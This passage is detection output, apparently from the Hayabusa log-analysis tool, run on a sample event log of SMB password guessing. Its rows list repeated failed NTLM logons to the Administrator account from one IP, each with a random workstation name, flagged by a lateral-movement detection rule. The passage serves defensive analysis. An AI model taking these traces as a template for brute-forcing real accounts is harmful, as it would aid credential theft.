| 1636 | 2016-09-20 01:50:50.548 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1637 | 2016-09-20 01:50:50.594 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1638 | 2016-09-20 01:50:50.628 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1639 | 2016-09-20 01:50:50.670 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1640 | 2016-09-20 01:50:50.712 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1641 | 2016-09-20 01:50:50.749 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1642 | 2016-09-20 01:50:50.784 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1643 | 2016-09-20 01:50:50.828 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1644 | 2016-09-20 01:50:50.869 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1645 | 2016-09-20 01:50:50.901 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Pa |
